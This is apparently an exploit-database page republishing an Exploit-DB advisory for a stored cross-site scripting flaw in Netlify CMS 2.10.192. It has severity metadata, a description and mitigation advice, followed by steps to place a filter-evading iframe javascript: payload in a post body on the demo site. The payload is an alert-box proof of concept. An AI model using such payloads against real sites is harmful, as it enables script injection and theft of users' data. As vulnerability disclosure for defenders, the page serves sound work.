header-logo
Suggest Exploit
vendor:
Netlify CMS
by:
tmrswrr
5.5
CVSS
MEDIUM
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Netlify CMS
Affected Version From: 2.10.0192
Affected Version To: 2.10.0192
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Netlify CMS 2.10.192 – Stored Cross-Site Scripting (XSS)

The Netlify CMS version 2.10.192 is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can inject malicious code into the body field of a new post, which will be executed when the post is saved. This can lead to the execution of arbitrary code in the context of the user's browser, potentially allowing for further exploitation or data theft.

Mitigation:

Update to a patched version of Netlify CMS that addresses the XSS vulnerability. Sanitize user input to prevent malicious code injection.
Source

Exploit-DB raw data:

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to new post and write body field your payload:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After save it XSS payload will executed and see alert box

Navigation

Suggest Exploit

Services By CQR